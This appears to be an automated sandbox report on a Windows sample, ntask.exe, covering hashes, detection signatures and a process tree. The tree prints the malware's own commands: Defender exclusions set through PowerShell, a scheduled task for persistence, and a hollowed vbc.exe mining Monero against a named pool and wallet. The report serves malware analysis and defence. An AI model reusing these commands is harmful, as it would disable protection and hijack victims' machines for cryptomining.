Analysis
-
max time kernel
145s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
02-05-2023 02:08
Static task
static1
Behavioral task
behavioral1
Sample
ntask.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
ntask.exe
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
ntask.exe
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
ntask.exe
Resource
win10v2004-20230220-en
General
-
Target
ntask.exe
-
Size
424.9MB
-
MD5
01acd528a1667196a0ad033a07434def
-
SHA1
4d9f342f615390ce65fe0bba3394a75124438a19
-
SHA256
726df5e4dbc4649d29ead6c0600c20ffd0a1a304207ae0f419a73c3b57fe8249
-
SHA512
7a5ac4af98ea1e2f27b20babf76e1e9a44e7ea9f247dddfa69f6b3ae159c9ad82c6f5e6791b3023cedbb9842e302de974c61b820e95d56ce7b5147947ce463b4
-
SSDEEP
49152:YiycrWBo+A5snqekfdvlDrCeTtavT1jwMRkoFGdPZVKxg5zpKqQ3DSM0+Co:Yt3Oc
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/628-204-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-205-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-206-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-208-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-209-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-210-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-211-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-213-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-214-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/628-217-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/4568-133-0x0000000000DC0000-0x0000000000FFA000-memory.dmp net_reactor behavioral2/files/0x0009000000023152-171.dat net_reactor behavioral2/files/0x0009000000023152-172.dat net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation WQLQLM.exe -
Executes dropped EXE 1 IoCs
pid Process 3432 WQLQLM.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3432 set thread context of 628 3432 WQLQLM.exe 106 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1544 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2604 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1284 powershell.exe 3052 powershell.exe 3052 powershell.exe 1284 powershell.exe 4600 powershell.exe 4112 powershell.exe 4600 powershell.exe 4112 powershell.exe 3432 WQLQLM.exe 3432 WQLQLM.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4568 ntask.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3432 WQLQLM.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 4112 powershell.exe Token: SeLockMemoryPrivilege 628 vbc.exe Token: SeLockMemoryPrivilege 628 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 628 vbc.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 4568 wrote to memory of 1284 4568 ntask.exe 87 PID 4568 wrote to memory of 1284 4568 ntask.exe 87 PID 4568 wrote to memory of 3052 4568 ntask.exe 90 PID 4568 wrote to memory of 3052 4568 ntask.exe 90 PID 4568 wrote to memory of 872 4568 ntask.exe 93 PID 4568 wrote to memory of 872 4568 ntask.exe 93 PID 872 wrote to memory of 2604 872 cmd.exe 95 PID 872 wrote to memory of 2604 872 cmd.exe 95 PID 872 wrote to memory of 3432 872 cmd.exe 96 PID 872 wrote to memory of 3432 872 cmd.exe 96 PID 3432 wrote to memory of 4112 3432 WQLQLM.exe 100 PID 3432 wrote to memory of 4112 3432 WQLQLM.exe 100 PID 3432 wrote to memory of 4600 3432 WQLQLM.exe 99 PID 3432 wrote to memory of 4600 3432 WQLQLM.exe 99 PID 3432 wrote to memory of 4712 3432 WQLQLM.exe 103 PID 3432 wrote to memory of 4712 3432 WQLQLM.exe 103 PID 4712 wrote to memory of 1544 4712 cmd.exe 105 PID 4712 wrote to memory of 1544 4712 cmd.exe 105 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 PID 3432 wrote to memory of 628 3432 WQLQLM.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\ntask.exe"C:\Users\Admin\AppData\Local\Temp\ntask.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDEEB.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2604
-
-
C:\ProgramData\English\WQLQLM.exe"C:\ProgramData\English\WQLQLM.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4112
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WQLQLM" /tr "C:\ProgramData\English\WQLQLM.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WQLQLM" /tr "C:\ProgramData\English\WQLQLM.exe"5⤵
- Creates scheduled task(s)
PID:1544
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4AAvbZFu6CJe2k13FgFmnDWHasLSbsKpXNumeQrWnZU8gpV9dURkEmJYtTYSohPLrCYA8bBN5PJRWbo1qgLuzpyNApcPYRh --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:628
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
732.0MB
MD57a338df586f9b9d6ac198d29dc3d8bfb
SHA103c3271ba83429eb17a65fd3b13b9181f0190bbd
SHA256c0bedf8adc4ee667df3d4671f0e877afed93e0d0cf386c0eee2a71bb2c05883e
SHA512e0dc2fb9ef4453a7fcb870e3c51dfc56033ad827226778e609b3b559aabe927a2db215d3dadbe6e8689d031da7897c7b381c8898905947fb03a58a5bb36170a1
-
Filesize
732.0MB
MD57a338df586f9b9d6ac198d29dc3d8bfb
SHA103c3271ba83429eb17a65fd3b13b9181f0190bbd
SHA256c0bedf8adc4ee667df3d4671f0e877afed93e0d0cf386c0eee2a71bb2c05883e
SHA512e0dc2fb9ef4453a7fcb870e3c51dfc56033ad827226778e609b3b559aabe927a2db215d3dadbe6e8689d031da7897c7b381c8898905947fb03a58a5bb36170a1
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD58b9e9b3d4882e7cfc310a522919899e3
SHA170d0ff19ec0fb6ad9e7fd090da12d69409f94f7e
SHA256001ff62b5e030d03e8f94551bca4ebb4850d70bcaf4371e7193213d5ca7d37fc
SHA512e0086b530cf4ab31999798a051a13b1724e00ce8bf065660628f4041ae5714b4531bb54500f52402c7d33320c909870a2d2f61d3a64f527af6437e90db9a099e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
142B
MD51e73fc378c36c831ba54b3c204bd8248
SHA10ad90963da60384a9ea1aff447c767d5b26e9b4a
SHA25666040b39b10b1fe463ef8f3e105573d010507d2635d53d5083762bf6c19fae53
SHA51217c4397adda0d03b706aa365152b7cf9980a68e7def00e3989d136b828bd1b2ff68095b52743425ac9f7fed96132c12f18dc5e3cc90f5f3cbe115dd1bd2165bb